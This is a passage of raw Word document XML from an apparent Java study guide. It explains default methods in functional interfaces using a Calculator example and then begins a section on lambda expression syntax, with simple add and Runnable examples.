      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: An interface can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple default methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but still, it can have only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for it to remain a valid functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C51389" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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138B39ED"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F39F3B1"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Calculator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46A8CA"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bstract method (must be implemented by the implementing class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC61EE8"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add(int a, int b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C75BD" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465D83C4"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Default method (with implementation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94C136"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efault int subtract(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4E146"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a - b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39031E29"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7A8DBAB" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3400019E"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Another default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4AE3B6"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efault int multiply(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770EAABC"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a * b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B8E49D"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8270752"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C5095AD" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8AF33A"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CalculatorTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA1C8B1"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0C9D193A"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Lambda expression implementing the abstract method 'add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD8145"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alculator calculator = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4D436" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193DF28A"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lling the abstract method 'add'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788E5738"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um: " + calculator.add(5, 3)); // Output: Sum: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4FD4D" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4566337C"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lling the default method 'subtract'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD204F1"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Difference: " + calculator.subtract(5, 3)); // Output: Difference: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20149D25" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51DD5734"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lling the default method 'multiply'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336739A9"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Product: " + calculator.multiply(5, 3)); // Output: Product: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BE515"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B30248E"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0F731D4" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F6E7A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it is implemented using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E1DB5" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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ubtract</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multiply</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with default implementations, so they are automatically available to any class that implements the Calculator interface (including the lambda expression used here).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434664FF" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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y Default Methods Are Useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D65F9" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ackward Compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods enable you to add new functionality to existing interfaces without breaking the implementing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DEB67" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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de Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default methods allow for code reuse across different implementing classes, which can help reduce code duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691CC8A0" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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void Interface Pollution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of creating a new interface with only one method to introduce new behavior, you can add a default method to the existing interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104985DC" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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mportant Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0F354" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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default method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not change the core behavior of a functional interface. It just provides an optional implementation that classes can use or override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3D661" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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wo interfaces have conflicting default methods (i.e., methods with the same signature), the implementing class will need to explicitly override the method and resolve the conflict.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463FA45" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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0A84D0EF" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="003224B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fault methods in functional interfaces are a powerful feature that allows interfaces to evolve over time without breaking existing implementations, enabling backward compatibility and enhancing the flexibility of Java interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7A17D6" w14:textId="3E9AD6D6" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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BBAF6CD">
          <v:rect id="_x0000_i1684" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7073D5" w14:textId="04E04D1E" w:rsidR="00AE2040" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE2040">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_Toc196307698"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is Lambda Expression?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w14:paraId="09F7E1BA" w14:textId="5EE9754B" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">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lambda expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is a concise way to represent </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (interfaces with a single abstract method) using an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>anonymous class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Lambda expressions allow you to pass behavior (i.e., a method) as an argument to other methods or use it as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-class citizen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in functional programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B560B" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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yntax of a Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340A3B0"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arameter(s)) -&gt; expression or block of code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4598C" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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rameter(s)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The input parameter(s) for the lambda expression (it can be one or more parameters, or no parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C3C0E" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The arrow token separates the parameters from the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18CA03" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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pression or block of code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The body of the lambda expression. It can either be a single expression or a block of code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310AC8A1" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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05BFA5EE"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s a simple example of a lambda expression that adds two numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D3BFB"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Traditional method in a class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202DF94"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Addition {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034810FA"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int add(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC002FC"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F7849"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8F640F1"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A262EC6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DD37E0"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Using Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B54CF6"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6056693C"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6E1003E7"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Lambda expression to add two numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77729E57"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ddFunction addition = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03315F54" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1822C667"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ll the method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09220955"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addition.add(5, 3)); // Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCB6ED"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D929304"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B1ED01A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28225282"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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C40FA1"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AddFunction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47987B7D"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add(int a, int b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC648BF"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4E1952A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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Characteristics of Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D243490" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ise Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions allow for more concise code as compared to anonymous class implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01015D05" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:firstLine="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fore Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A4117" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:left="144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unnable r = new Runnable() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FD2A5" w14:textId="7D025D06" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:left="144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run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC0C744" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:left="144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Hello, world!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA94A31" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:left="144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2900ABA" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:left="144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AF83BA5" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:left="1440"/>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ith Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014D3A6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:ind w:left="144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unnable r = () -&gt; System.out.println("Hello, world!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0875AC" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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unctional Interface</w:t>
      </w:r>
